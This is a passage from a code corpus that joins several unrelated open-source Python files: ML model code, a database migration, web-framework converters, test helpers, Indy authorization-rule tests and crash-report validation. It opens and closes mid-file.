self.input_spec.label_feature.feature_name lite_runner = model_util.get_lite_runner(tflite_filepath, self.model_spec) ds = data.gen_dataset(batch_size=1, is_training=False) max_output_size = data.max_vocab_id + 1 # +1 because 0 is reserved for OOV. eval_top_k = self.model_hparams.eval_top_k metrics = [ _metrics.GlobalRecall(top_k=k, name=f'Global_Recall/Recall_{k}') for k in eval_top_k ] for feature, y_true in data_util.generate_elements(ds): feature.pop(label_name) x = feature ids, scores = lite_runner.run(x) # y_true: shape [1, 1] # y_pred: shape [1, max_output_size]; fill only scores with top-k ids. y_pred = np.zeros([1, max_output_size]) for i, score in zip(ids, scores): if i in data.vocab: # Only set if id is in vocab. y_pred[0, i] = score # Update metrics. for m in metrics: m.update_state(y_true, y_pred) result = collections.OrderedDict([(m.name, m.result()) for m in metrics]) return result @classmethod def create(cls, train_data, model_spec: recommendation_spec.RecommendationSpec, model_dir: str = None, validation_data=None, batch_size: int = 16, steps_per_epoch: int = 10000, epochs: int = 1, learning_rate: float = 0.1, gradient_clip_norm: float = 1.0, shuffle: bool = True, do_train: bool = True): """Loads data and train the model for recommendation. Args: train_data: Training data. model_spec: ModelSpec, Specification for the model. model_dir: str, path to export model checkpoints and summaries. validation_data: Validation data. batch_size: Batch size for training. steps_per_epoch: int, Number of step per epoch. epochs: int, Number of epochs for training. learning_rate: float, learning rate. gradient_clip_norm: float, clip threshold (<= 0 meaning no clip). shuffle: boolean, whether the training data should be shuffled. do_train: boolean, whether to run training. Returns: An instance based on Recommendation. """ # Use model_dir or a temp folder to store intermediate checkpoints, etc. if model_dir is None: model_dir = tempfile.mkdtemp() recommendation = cls( model_spec, model_dir=model_dir, shuffle=shuffle, learning_rate=learning_rate, gradient_clip_norm=gradient_clip_norm) if do_train: tf.compat.v1.logging.info('Training recommendation model...') recommendation.train( train_data, validation_data, batch_size=batch_size, steps_per_epoch=steps_per_epoch, epochs=epochs) else: recommendation.create_model(do_train=False) return recommendation # Shortcut function. create = Recommendation.create mm_export('recommendation.create').export_constant(__name__, 'create')
migrations/versions/9d370f33f1a0_user_login_types.py
pombredanne/vulncode-db
592
12748198
<gh_stars>100-1000 """user login types Revision ID: 9d370f33f1a0 Revises: <KEY> Create Date: 2020-11-30 12:58:31.046646 """ from alembic import op import sqlalchemy as sa from sqlalchemy.dialects import mysql # revision identifiers, used by Alembic. revision = "9d370f33f1a0" down_revision = "<KEY>" branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.add_column( "user", sa.Column( "login_type", sa.Enum("LOCAL", "GOOGLE", "GITHUB", name="logintype"), nullable=True, ), ) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_column("user", "login_type") # ### end Alembic commands ###
bocadillo/converters.py
teaglebuilt/bocadillo
434
12748239
<reponame>teaglebuilt/bocadillo import decimal import inspect from datetime import date, datetime, time from functools import wraps import typing import typesystem FIELD_ALIASES: typing.Dict[typing.Type, typesystem.Field] = { int: typesystem.Integer, float: typesystem.Float, bool: typesystem.Boolean, decimal.Decimal: typesystem.Decimal, date: typesystem.Date, time: typesystem.Time, datetime: typesystem.DateTime, } class PathConversionError(typesystem.ValidationError): pass class Converter: __slots__ = ("func", "signature", "annotations", "required_params") def __init__(self, func: typing.Callable): self.func = func self.signature = inspect.signature(self.func) self.annotations: typing.Dict[str, typing.Type] = { param.name: param.annotation for param in self.signature.parameters.values() if param.annotation is not inspect.Parameter.empty } self.required_params = set( param.name for param in self.signature.parameters.values() if param.default is inspect.Parameter.empty ) def convert(self, args: tuple, kwargs: dict) -> typing.Tuple[tuple, dict]: bound: inspect.BoundArguments = self.signature.bind(*args, **kwargs) errors: typing.List[typesystem.ValidationError] = [] for param_name, value in bound.arguments.items(): try: annotation = self.annotations[param_name] except KeyError: continue # Find the TypeSystem field for the parameter's annotation. if isinstance(annotation, typesystem.Field): field = annotation else: try: field = FIELD_ALIASES[annotation]() except KeyError: continue # Perform validation. try: value = field.validate(value) except typesystem.ValidationError as exc: # NOTE: `add_prefix` sets the key of the error in the final # error's dict representation. errors.extend(exc.messages(add_prefix=param_name)) else: bound.arguments[param_name] = value if errors: raise PathConversionError(messages=errors) # NOTE: apply defaults last to prevent validating the default values. # It's faster and less bug-prone. bound.apply_defaults() return bound.args, bound.kwargs class ViewConverter(Converter): __slots__ = ("query_parameters",) def __init__(self, func: typing.Callable): super().__init__(func) self.query_parameters = set( param.name for param in self.signature.parameters.values() if param.default is not inspect.Parameter.empty ) def get_query_params(self, args: tuple, kwargs: dict) -> dict: raise NotImplementedError def convert(self, args: tuple, kwargs: dict) -> typing.Tuple[tuple, dict]: query_params = self.get_query_params(args, kwargs) for param_name in self.query_parameters: if param_name in query_params: kwargs[param_name] = query_params[param_name] return super().convert(args, kwargs) def convert_arguments( func: typing.Callable, converter_class: typing.Type[Converter] ) -> typing.Callable: converter = converter_class(func) @wraps(func) async def converted(*args, **kwargs): args, kwargs = converter.convert(args, kwargs) return await func(*args, **kwargs) return converted
machine-learning-ex7/ex7/computeCentroids.py
ShawnT4ever/coursera-ml-py
1,333
12748242
<filename>machine-learning-ex7/ex7/computeCentroids.py import numpy as np def compute_centroids(X, idx, K): # Useful values (m, n) = X.shape # You need to return the following variable correctly. centroids = np.zeros((K, n)) # ===================== Your Code Here ===================== # Instructions: Go over every centroid and compute mean of all points that # belong to it. Concretely, the row vector centroids[i] # should contain the mean of the data points assigned to # centroid i. # # ========================================================== return centroids
foundations_ui/cypress/fixtures/atlas_scheduler/envsubst.py
DeepLearnI/atlas
296
12748254
<reponame>DeepLearnI/atlas<filename>foundations_ui/cypress/fixtures/atlas_scheduler/envsubst.py def _flattened_config_walk(): import os import os.path as path for dir_name, _, files in os.walk('cypress/fixtures/atlas_scheduler/.foundations'): for file_name in files: if file_name.endswith('.envsubst.yaml'): yield path.join(dir_name, file_name) def _config(): import os import sys import subprocess for required_env in [ 'CYPRESS_LOCAL_FOUNDATIONS_HOME', 'CYPRESS_SCHEDULER_IP', 'CYPRESS_SCHEDULER_FOUNDATIONS_HOME', 'CYPRESS_SCHEDULER_REDIS_PORT', 'CYPRESS_GUI_HOST', 'CYPRESS_GUI_PORT']: if not os.environ.get(required_env, None): print(f'Environment variable {required_env} is not set.') sys.exit(1) for template_file_name in _flattened_config_walk(): output_file_name = template_file_name[:-len('.envsubst.yaml')] + '.yaml' subprocess.run(f'envsubst < {template_file_name} > {output_file_name}', shell=True) _config()
DataFlow_Suite/lstm_exec.py
seenu037/algotrading
200
12748256
<filename>DataFlow_Suite/lstm_exec.py<gh_stars>100-1000 import tensorflow as tf import numpy as np import numpy.random as rng import pandas.io.data as web import numpy as np import pandas as pd def get_prices(symbol): start, end = '2007-05-02', '2016-04-11' data = web.DataReader(symbol, 'yahoo', start, end) data=pd.DataFrame(data) prices=data['Adj Close'] prices=prices.astype(float) return prices def get_returns(prices): return ((prices-prices.shift(-1))/prices)[:-1] def get_data(list): l = [] for symbol in list: rets = get_returns(get_prices(symbol)) l.append(rets) return np.array(l).T symbol_list = ['C', 'GS'] rets = get_data(symbol_list) def lstm_iterator(raw_data, num_steps, data_size): batch_size=1 raw_data = np.array(raw_data, dtype=np.float32) data_len = len(raw_data) batch_len = data_len // batch_size data = np.zeros([batch_size, batch_len, data_size], dtype=np.float32) for i in range(batch_size): data[i] = raw_data[batch_len * i:batch_len * (i + 1),:] epoch_size = (batch_len - 1) // num_steps if epoch_size == 0: raise ValueError("epoch_size == 0, decrease batch_size or num_steps") for i in range(epoch_size): x = data[:, i*num_steps:(i+1)*num_steps] y = data[:, i*num_steps+1:(i+1)*num_steps+1] yield (x[0], y[0]) class LSTMModel(object): def __init__(self, num_steps, num_samples):#, config): symbol_list = ['C', 'GS'] positions = tf.constant([-1,0,1]) #long, neutral or short num_positions = 3 num_symbols = len(symbol_list) self.num_samples = num_samples self.num_steps = num_steps #n_input = num_symbols * 100 hidden_size=21 n_classes = num_positions * num_symbols #self.num_steps = tf.placeholder(tf.int64) # define placeholders self.inputs_ = tf.placeholder(tf.float32, [None, num_symbols]) self.targets_ = tf.placeholder(tf.float32, [None, num_symbols]) cell = tf.nn.rnn_cell.BasicLSTMCell(hidden_size, forget_bias=0.0, state_is_tuple=True) #cell = tf.nn.rnn_cell.MultiRNNCell([cell] * config.num_layers) cell = tf.nn.rnn_cell.InputProjectionWrapper(cell, num_symbols) cell = tf.nn.rnn_cell.OutputProjectionWrapper(cell, n_classes) outputs=[] self.initial_state = cell.zero_state(1, tf.float32) state = self.initial_state time_step = 0 '''with tf.variable_scope("RNN"): def body(x): inp = self.inputs_[time_step,:] inp = tf.reshape(inp, [1,-1]) (cell_output, state) = cell(inp, state) outputs.append(cell_output) return def condition(x): return tf.reduce_sum(x) < 100 tf.while_loop(condition, body, [x])''' with tf.variable_scope("RNN"): for time_step in range(self.num_steps): #####num_steps??? if time_step > 0: tf.get_variable_scope().reuse_variables() inp = self.inputs_[time_step,:] inp = tf.reshape(inp, [1,-1]) (cell_output, state) = cell(inp, state) outputs.append(cell_output) #[6,] self.final_state = state y = tf.reshape(tf.concat(1, outputs), [-1, n_classes]) # loop through symbol, taking the columns for each symbol's bucket together pos = {} sample_n = {} sample_mask = {} symbol_returns = {} relevant_target_column = {} for i in range(num_symbols): # isolate the buckets relevant to the symbol and get a softmax as well symbol_probs = y[:,i*num_positions:(i+1)*num_positions] symbol_probs_softmax = tf.nn.softmax(symbol_probs) # softmax[i, j] = exp(logits[i, j]) / sum(exp(logits[i])) # sample probability to chose our policy's action sample = tf.multinomial(tf.log(symbol_probs_softmax), num_samples) for sample_iter in range(num_samples): sample_n[i*num_samples + sample_iter] = sample[:,sample_iter] pos[i*num_samples + sample_iter] = tf.reshape(sample_n[i*num_samples + sample_iter], [-1]) - 1 symbol_returns[i*num_samples + sample_iter] = tf.mul( tf.cast(pos[i*num_samples + sample_iter], tf.float32), self.targets_[:,i]) sample_mask[i*num_samples + sample_iter] = tf.cast(tf.reshape(tf.one_hot(sample_n[i*num_samples + sample_iter], 3), [-1,3]), tf.float32) relevant_target_column[i*num_samples + sample_iter] = tf.reduce_sum( symbol_probs * sample_mask[i*num_samples + sample_iter],1) daily_returns_by_symbol_ = tf.concat(1, [tf.reshape(t, [-1,1]) for t in symbol_returns.values()]) daily_returns_by_symbol = tf.transpose(tf.reshape(daily_returns_by_symbol_, [-1,2,num_samples]), [0,2,1]) #[?,5,2] daily_returns = tf.reduce_mean(daily_returns_by_symbol, 2) # [?,5] total_return = tf.reduce_prod(daily_returns+1, 0) z = tf.ones_like(total_return) * -1 self.total_return = total_return = tf.add(total_return, z) ann_vol = tf.mul( tf.sqrt(tf.reduce_mean(tf.pow((daily_returns - tf.reduce_mean(daily_returns, 0)),2),0)) , np.sqrt(252) ) self.sharpe = tf.div(total_return, ann_vol) #Maybe metric slicing later #segment_ids = tf.ones_like(daily_returns[:,0]) #partial_prod = tf.segment_prod(daily_returns+1, segment_ids) training_target_cols = tf.concat(1, [tf.reshape(t, [-1,1]) for t in relevant_target_column.values()]) ones = tf.ones_like(training_target_cols) gradient_ = tf.nn.sigmoid_cross_entropy_with_logits(training_target_cols, ones) gradient = tf.transpose(tf.reshape(gradient_, [-1,2,num_samples]), [0,2,1]) #[?,5,2] #cost = tf.mul(gradient , daily_returns_by_symbol_reshaped) #cost = tf.mul(gradient , tf.expand_dims(daily_returns, -1)) cost = tf.mul(gradient , tf.expand_dims(total_return, -1)) #cost = tf.mul(gradient , tf.expand_dims(sharpe, -1)) self.optimizer = tf.train.GradientDescentOptimizer(0.0001).minimize(cost) self.costfn = tf.reduce_mean(cost) def run_train_results(m, epoch): state = m.initial_state.eval() rs = rets[:-200] full_feed = {m.inputs_: rs[:-1], m.targets_: rs[1:], m.initial_state: state} t,s, c = session.run([ m.total_return, m.sharpe, m.costfn], feed_dict=full_feed) t = np.mean(t) s = np.mean(s) print("Epoch:", '%04d' % (epoch+1), "cost=",c, "total return=", "{:.9f}".format(t), "sharpe=", "{:.9f}".format(s)) return t def run_test_results(m, epoch): state = m.initial_state.eval() rs = rets[-200:] full_feed = {m.inputs_: rs[:-1], m.targets_: rs[1:], m.initial_state: state} t,s, c = session.run([ m.total_return, m.sharpe, m.costfn], feed_dict=full_feed) t = np.mean(t) s = np.mean(s) print("Epoch:", '%04d' % (epoch+1), "cost=",c, "total return=", "{:.9f}".format(t), "sharpe=", "{:.9f}".format(s)) return t def run_epoch(m, epoch): full_feed = {m.inputs_: rets[:-1], m.targets_: rets[1:]} state = m.initial_state.eval() for step, (x, y) in enumerate(lstm_iterator(rets,20,2 )): #m.num_steps = len(x) feed_dict = {m.inputs_: x, m.targets_: y, m.initial_state: state} _ , state = session.run([m.optimizer, m.final_state], feed_dict=feed_dict) return results = [] pos_results = [] with tf.Graph().as_default(), tf.Session() as session: with tf.variable_scope("model", reuse=None):#, initializer=init): m = LSTMModel(num_steps = 20, num_samples = 5)#, config=config) with tf.variable_scope("model", reuse=True):#, initializer=init): mvalid = LSTMModel(num_steps = len(rets[:-200]) -1, num_samples = 1)#, config=config) with tf.variable_scope("model", reuse=True):#, initializer=init): mtest = LSTMModel(num_steps = len(rets[-200:]) -1, num_samples = 1) tf.initialize_all_variables().run() for epoch in range(10): run_epoch(m, epoch ) print('getting results...') trt = run_train_results(mvalid, epoch) print('trt') ttt = run_test_results(mtest, epoch) print('test: ',ttt) results.append(ttt) if trt>0: pos_results.append(ttt) print(np.mean(results)) print(np.mean(pos_results))
indy_common/test/auth/metadata/test_auth_rule_with_metadata_simple.py
Rob-S/indy-node
627
12748270
<reponame>Rob-S/indy-node from indy_common.authorize.auth_constraints import AuthConstraint, IDENTITY_OWNER, AuthConstraintForbidden from indy_common.constants import ENDORSER from indy_common.test.auth.metadata.helper import validate, PLUGIN_FIELD, Action from plenum.common.constants import TRUSTEE MAX_SIG_COUNT = 3 def test_plugin_simple_rule_1_sig_owner_no_endorser(write_auth_req_validator, write_request_validation, signatures, is_owner, amount): validate( auth_constraint=AuthConstraint(role=IDENTITY_OWNER, sig_count=1, need_to_be_owner=True, metadata={PLUGIN_FIELD: 2}), valid_actions=[ Action(author=IDENTITY_OWNER, endorser=None, sigs={IDENTITY_OWNER: s}, is_owner=True, amount=2, extra_sigs=False) for s in range(1, MAX_SIG_COUNT + 1) ], author=IDENTITY_OWNER, endorser=None, all_signatures=signatures, is_owner=is_owner, amount=amount, write_auth_req_validator=write_auth_req_validator, write_request_validation=write_request_validation ) def test_plugin_simple_rule_1_sig_owner_endorser(write_auth_req_validator, write_request_validation, signatures, is_owner, amount): validate( auth_constraint=AuthConstraint(role=IDENTITY_OWNER, sig_count=1, need_to_be_owner=True, metadata={PLUGIN_FIELD: 2}), valid_actions=[ Action(author=IDENTITY_OWNER, endorser=ENDORSER, sigs={IDENTITY_OWNER: s1, ENDORSER: s2}, is_owner=True, amount=2, extra_sigs=True) for s1 in range(1, MAX_SIG_COUNT + 1) for s2 in range(1, MAX_SIG_COUNT + 1) ], author=IDENTITY_OWNER, endorser=ENDORSER, all_signatures=signatures, is_owner=is_owner, amount=amount, write_auth_req_validator=write_auth_req_validator, write_request_validation=write_request_validation ) def test_plugin_simple_rule_1_sig_endorser_no_endorser(write_auth_req_validator, write_request_validation, signatures, is_owner, amount): validate( auth_constraint=AuthConstraint(role=ENDORSER, sig_count=1, need_to_be_owner=True, metadata={PLUGIN_FIELD: 2}), valid_actions=[ Action(author=ENDORSER, endorser=None, sigs={ENDORSER: s}, is_owner=True, amount=2, extra_sigs=True) for s in range(1, MAX_SIG_COUNT + 1) ], author=ENDORSER, endorser=None, all_signatures=signatures, is_owner=is_owner, amount=amount, write_auth_req_validator=write_auth_req_validator, write_request_validation=write_request_validation ) def test_plugin_simple_rule_1_sig_endorser_endorser(write_auth_req_validator, write_request_validation, signatures, is_owner, amount): validate( auth_constraint=AuthConstraint(role=ENDORSER, sig_count=1, need_to_be_owner=True, metadata={PLUGIN_FIELD: 2}), valid_actions=[ Action(author=ENDORSER, endorser=ENDORSER, sigs={ENDORSER: s}, is_owner=True, amount=2, extra_sigs=True) for s in range(1, MAX_SIG_COUNT + 1) ], author=ENDORSER, endorser=ENDORSER, all_signatures=signatures, is_owner=is_owner, amount=amount, write_auth_req_validator=write_auth_req_validator, write_request_validation=write_request_validation ) def test_plugin_simple_rule_1_sig_trustee_no_endorser(write_auth_req_validator, write_request_validation, signatures, is_owner, amount): validate( auth_constraint=AuthConstraint(role=ENDORSER, sig_count=1, need_to_be_owner=True, metadata={PLUGIN_FIELD: 2}), valid_actions=[ Action(author=TRUSTEE, endorser=None, sigs={ENDORSER: s1, TRUSTEE: s2}, is_owner=True, amount=2, extra_sigs=True) for s1 in range(1, MAX_SIG_COUNT + 1) for s2 in range(1, MAX_SIG_COUNT + 1) ], author=TRUSTEE, endorser=None, all_signatures=signatures, is_owner=is_owner, amount=amount, write_auth_req_validator=write_auth_req_validator, write_request_validation=write_request_validation ) def test_plugin_simple_rule_1_sig_trustee_endorser(write_auth_req_validator, write_request_validation, signatures, is_owner, amount): validate( auth_constraint=AuthConstraint(role=ENDORSER, sig_count=1, need_to_be_owner=True, metadata={PLUGIN_FIELD: 2}), valid_actions=[ Action(author=TRUSTEE, endorser=ENDORSER, sigs={TRUSTEE: s2, ENDORSER: s3}, is_owner=True, amount=2, extra_sigs=True) for s1 in range(1, MAX_SIG_COUNT + 1) for s2 in range(1, MAX_SIG_COUNT + 1) for s3 in range(1, MAX_SIG_COUNT + 1) ], author=TRUSTEE, endorser=ENDORSER, all_signatures=signatures, is_owner=is_owner, amount=amount, write_auth_req_validator=write_auth_req_validator, write_request_validation=write_request_validation ) def test_plugin_simple_rule_1_sig_all_roles_owner_no_endorser(write_auth_req_validator, write_request_validation, signatures, is_owner, off_ledger_signature, amount): validate( auth_constraint=AuthConstraint(role='*', sig_count=1, need_to_be_owner=True, off_ledger_signature=off_ledger_signature, metadata={PLUGIN_FIELD: 2}), valid_actions=[ Action(author=IDENTITY_OWNER, endorser=None, sigs={IDENTITY_OWNER: s}, is_owner=True, amount=2, extra_sigs=False) for s in range(1, MAX_SIG_COUNT + 1) ], author=IDENTITY_OWNER, endorser=None, all_signatures=signatures, is_owner=is_owner, amount=amount, write_auth_req_validator=write_auth_req_validator, write_request_validation=write_request_validation ) def test_plugin_simple_rule_1_sig_all_roles_owner_endorser(write_auth_req_validator, write_request_validation, signatures, is_owner, off_ledger_signature, amount): validate( auth_constraint=AuthConstraint(role='*', sig_count=1, need_to_be_owner=True, off_ledger_signature=off_ledger_signature, metadata={PLUGIN_FIELD: 2}), valid_actions=[ Action(author=IDENTITY_OWNER, endorser=ENDORSER, sigs={IDENTITY_OWNER: s1, ENDORSER: s2}, is_owner=True, amount=2, extra_sigs=True) for s1 in range(1, MAX_SIG_COUNT + 1) for s2 in range(1, MAX_SIG_COUNT + 1) ], author=IDENTITY_OWNER, endorser=ENDORSER, all_signatures=signatures, is_owner=is_owner, amount=amount, write_auth_req_validator=write_auth_req_validator, write_request_validation=write_request_validation ) def test_plugin_simple_rule_1_sig_all_roles_trustee_no_endorser(write_auth_req_validator, write_request_validation, signatures, is_owner, off_ledger_signature, amount): validate( auth_constraint=AuthConstraint(role='*', sig_count=1, need_to_be_owner=True, off_ledger_signature=off_ledger_signature, metadata={PLUGIN_FIELD: 2}), valid_actions=[ Action(author=TRUSTEE, endorser=None, sigs={TRUSTEE: s1}, is_owner=True, amount=2, extra_sigs=True) for s1 in range(1, MAX_SIG_COUNT + 1) ], author=TRUSTEE, endorser=None, all_signatures=signatures, is_owner=is_owner, amount=amount, write_auth_req_validator=write_auth_req_validator, write_request_validation=write_request_validation ) def test_plugin_simple_rule_1_sig_all_roles_trustee_endorser(write_auth_req_validator, write_request_validation, signatures, is_owner, off_ledger_signature, amount): validate( auth_constraint=AuthConstraint(role='*', sig_count=1, need_to_be_owner=True, off_ledger_signature=off_ledger_signature, metadata={PLUGIN_FIELD: 2}), valid_actions=[ Action(author=TRUSTEE, endorser=ENDORSER, sigs={TRUSTEE: s1, ENDORSER: s2}, is_owner=True, amount=2, extra_sigs=True) for s1 in range(1, MAX_SIG_COUNT + 1) for s2 in range(1, MAX_SIG_COUNT + 1) ], author=TRUSTEE, endorser=ENDORSER, all_signatures=signatures, is_owner=is_owner, amount=amount, write_auth_req_validator=write_auth_req_validator, write_request_validation=write_request_validation ) def test_plugin_simple_rule_3_sig_trustee_no_endorser(write_auth_req_validator, write_request_validation, signatures, is_owner, amount): validate( auth_constraint=AuthConstraint(role=TRUSTEE, sig_count=3, need_to_be_owner=False, metadata={PLUGIN_FIELD: 2}), valid_actions=[ Action(author=TRUSTEE, endorser=None, sigs={TRUSTEE: 3}, is_owner=owner, amount=2, extra_sigs=True) for owner in [True, False]], author=TRUSTEE, endorser=None, all_signatures=signatures, is_owner=is_owner, amount=amount, write_auth_req_validator=write_auth_req_validator, write_request_validation=write_request_validation ) def test_plugin_simple_rule_3_sig_trustee_endorser(write_auth_req_validator, write_request_validation, signatures, is_owner, amount): validate( auth_constraint=AuthConstraint(role=TRUSTEE, sig_count=3, need_to_be_owner=False, metadata={PLUGIN_FIELD: 2}), valid_actions=[ Action(author=TRUSTEE, endorser=ENDORSER, sigs={TRUSTEE: 3, ENDORSER: s1}, is_owner=owner, amount=2, extra_sigs=True) for s1 in range(1, MAX_SIG_COUNT + 1) for owner in [True, False] ], author=TRUSTEE, endorser=ENDORSER, all_signatures=signatures, is_owner=is_owner, amount=amount, write_auth_req_validator=write_auth_req_validator, write_request_validation=write_request_validation ) def test_plugin_simple_rule_3_sig_owner_no_endorser(write_auth_req_validator, write_request_validation, signatures, is_owner, amount): validate( auth_constraint=AuthConstraint(role=TRUSTEE, sig_count=3, need_to_be_owner=False, metadata={PLUGIN_FIELD: 2}), valid_actions=[], author=IDENTITY_OWNER, endorser=None, all_signatures=signatures, is_owner=is_owner, amount=amount, write_auth_req_validator=write_auth_req_validator, write_request_validation=write_request_validation ) def test_plugin_simple_rule_3_sig_owner_endorser(write_auth_req_validator, write_request_validation, signatures, is_owner, amount): validate( auth_constraint=AuthConstraint(role=TRUSTEE, sig_count=3, need_to_be_owner=False, metadata={PLUGIN_FIELD: 2}), valid_actions=[ Action(author=IDENTITY_OWNER, endorser=ENDORSER, sigs={TRUSTEE: 3, IDENTITY_OWNER: s1, ENDORSER: s2}, is_owner=owner, amount=2, extra_sigs=True) for s1 in range(1, MAX_SIG_COUNT + 1) for s2 in range(1, MAX_SIG_COUNT + 1) for owner in [True, False] ], author=IDENTITY_OWNER, endorser=ENDORSER, all_signatures=signatures, is_owner=is_owner, amount=amount, write_auth_req_validator=write_auth_req_validator, write_request_validation=write_request_validation ) def test_plugin_simple_rule_0_sig_owner_no_endorser(write_auth_req_validator, write_request_validation, signatures, is_owner, off_ledger_signature, amount): validate( auth_constraint=AuthConstraint(role='*', sig_count=0, need_to_be_owner=False, off_ledger_signature=off_ledger_signature, metadata={PLUGIN_FIELD: 2}), valid_actions=[Action(author=IDENTITY_OWNER, endorser=None, sigs={}, is_owner=owner, amount=2, extra_sigs=False) for owner in [True, False]] + [ Action(author=IDENTITY_OWNER, endorser=None, sigs={IDENTITY_OWNER: s}, is_owner=owner, amount=2, extra_sigs=False) for owner in [True, False] for s in range(1, MAX_SIG_COUNT + 1)], author=IDENTITY_OWNER, endorser=None, all_signatures=signatures, is_owner=is_owner, amount=amount, write_auth_req_validator=write_auth_req_validator, write_request_validation=write_request_validation ) def test_plugin_simple_rule_0_sig_owner_endorser(write_auth_req_validator, write_request_validation, signatures, is_owner, off_ledger_signature, amount): validate( auth_constraint=AuthConstraint(role='*', sig_count=0, need_to_be_owner=False, off_ledger_signature=off_ledger_signature, metadata={PLUGIN_FIELD: 2}), valid_actions=[Action(author=IDENTITY_OWNER, endorser=ENDORSER, sigs={ENDORSER: s}, is_owner=owner, amount=2, extra_sigs=True) for s in range(1, MAX_SIG_COUNT + 1) for owner in [True, False]], author=IDENTITY_OWNER, endorser=ENDORSER, all_signatures=signatures, is_owner=is_owner, amount=amount, write_auth_req_validator=write_auth_req_validator, write_request_validation=write_request_validation ) def test_plugin_simple_rule_0_sig_trustee_no_endorser(write_auth_req_validator, write_request_validation, signatures, is_owner, off_ledger_signature, amount): validate( auth_constraint=AuthConstraint(role='*', sig_count=0, need_to_be_owner=False, off_ledger_signature=off_ledger_signature, metadata={PLUGIN_FIELD: 2}), valid_actions=[Action(author=TRUSTEE, endorser=None, sigs=signature, is_owner=owner, amount=2, extra_sigs=True) for signature in signatures for owner in [True, False]], author=TRUSTEE, endorser=None, all_signatures=signatures, is_owner=is_owner, amount=amount, write_auth_req_validator=write_auth_req_validator, write_request_validation=write_request_validation ) def test_plugin_simple_rule_0_sig_trustee_endorser(write_auth_req_validator, write_request_validation, signatures, is_owner, off_ledger_signature, amount): validate( auth_constraint=AuthConstraint(role='*', sig_count=0, need_to_be_owner=False, off_ledger_signature=off_ledger_signature, metadata={PLUGIN_FIELD: 2}), valid_actions=[Action(author=TRUSTEE, endorser=ENDORSER, sigs={ENDORSER: s}, is_owner=owner, amount=2, extra_sigs=True) for s in range(1, MAX_SIG_COUNT + 1) for owner in [True, False]], author=TRUSTEE, endorser=ENDORSER, all_signatures=signatures, is_owner=is_owner, amount=amount, write_auth_req_validator=write_auth_req_validator, write_request_validation=write_request_validation ) def test_plugin_simple_rule_not_allowed(write_auth_req_validator, write_request_validation, author, endorser, signatures, is_owner, amount): validate( auth_constraint=AuthConstraintForbidden(), valid_actions=[], author=author, endorser=endorser, all_signatures=signatures, is_owner=is_owner, amount=amount, write_auth_req_validator=write_auth_req_validator, write_request_validation=write_request_validation )
chrome/test/kasko/py/kasko/report.py
google-ar/chromium
777
12748304
<reponame>google-ar/chromium #!/usr/bin/env python # Copyright 2016 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Utility functions for dealing with crash reports.""" import logging import os _LOGGER = logging.getLogger(os.path.basename(__file__)) def LogCrashKeys(report): for key in sorted(report.keys()): val = report[key][0] if (len(val) < 64): _LOGGER.debug('Got crashkey "%s": "%s"', key, val) else: _LOGGER.debug('Got crashkey "%s": ...%d bytes...', key, len(val)) def ValidateCrashReport(report, expectations=None): expected_keys = {} # The following keys are all expected to be set in all crashes, and should # be set by GetCrashKeysForKasko. The 'channel' crash-key doesn't need to be # set as it is omitted when empty (developer builds). get_crash_keys = 'GetCrashKeysForKasko' for k in ['guid', 'prod', 'plat', 'ver', 'ptype']: expected_keys[k] = get_crash_keys # The following crash keys are expected to be set by the Kasko code itself. kasko = 'Kasko' for k in ['kasko-generated-by-version', 'kasko-uploaded-by-version']: expected_keys[k] = kasko # Merge in additional expectations. if expectations: for key, value in expectations.iteritems(): expected_keys[key] = value # Validate the expectations. missing_keys = False for expected_key, error in expected_keys.iteritems(): if expected_key not in report: _LOGGER.error('Missing expected "%s" crash key.', expected_key) _LOGGER.error('"%s" integration appears broken.', error) missing_keys = True if missing_keys: raise Exception('Missing expected crash keys.')
lib/django-0.96/django/conf/project_template/urls.py
MiCHiLU/google_appengine_sdk
790
12748335
<filename>lib/django-0.96/django/conf/project_template/urls.py from django.conf.urls.defaults import * urlpatterns = patterns('', # Example: # (r'^{{ project_name }}/', include('{{ project_name }}.foo.urls')), # Uncomment this for admin: # (r'^admin/', include('django.contrib.admin.urls')), )
edward2/jax/nn/random_feature.py
google/edward2
591
12748339
# coding=utf-8 # Copyright 2021 The Edward2 Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Definitions for random feature Gaussian process layer. ## References: [1]: Liu et al. Simple and principled uncertainty estimation with deterministic deep learning via distance awareness. In _Neural Information Processing Systems_, 2020. https://arxiv.org/abs/2006.10108 [2]: Xu et al. Understanding and Improving Layer Normalization. In _Neural Information Processing Systems_, 2019. https://papers.nips.cc/paper/2019/file/2f4fe03d77724a7217006e5d16728874-Paper.pdf [3]: <NAME> and <NAME>. Random Features for Large-Scale Kernel Machines. In _Neural Information Processing Systems_, 2007. https://people.eecs.berkeley.edu/~brecht/papers/07.rah.rec.nips.pdf [4]: <NAME>, <NAME>, <NAME>. Uncertainty Estimation with Infinitesimal Jackknife. _arXiv preprint arXiv:2006.07584_, 2020. https://arxiv.org/abs/2006.07584 """ import dataclasses import functools from typing import Any, Callable, Iterable, Mapping, Optional, Tuple, Union import flax.linen as nn import jax from jax import lax from jax import random import jax.numpy as jnp # Jax-related data types. PRNGKey = Any Shape = Iterable[int] Dtype = type(jnp.float32) Array = jnp.ndarray Initializer = Callable[[PRNGKey, Shape, Dtype], Array] # Default config for random features. default_rbf_activation = jnp.cos default_rbf_bias_init = nn.initializers.uniform(scale=2. * jnp.pi) # Using "he_normal" style random feature distribution. Effectively, this is # equivalent to approximating a RBF kernel but with the input standardized by # its dimensionality (i.e., input_scaled = input * sqrt(2. / dim_input)) and # empirically leads to better performance for neural network inputs. default_rbf_kernel_init = nn.initializers.variance_scaling( scale=2.0, mode='fan_in', distribution='normal') # Default field value for kwargs, to be used for data class declaration. default_kwarg_dict = lambda: dataclasses.field(default_factory=dict) SUPPORTED_LIKELIHOOD = ('binary_logistic', 'poisson', 'gaussian') MIN_SCALE_MONTE_CARLO = 1e-3 class RandomFeatureGaussianProcess(nn.Module): """A Gaussian process layer using random Fourier features [1]. Attributes: features: the number of output units. hidden_features: the number of hidden random fourier features. normalize_input: whether to normalize the input using 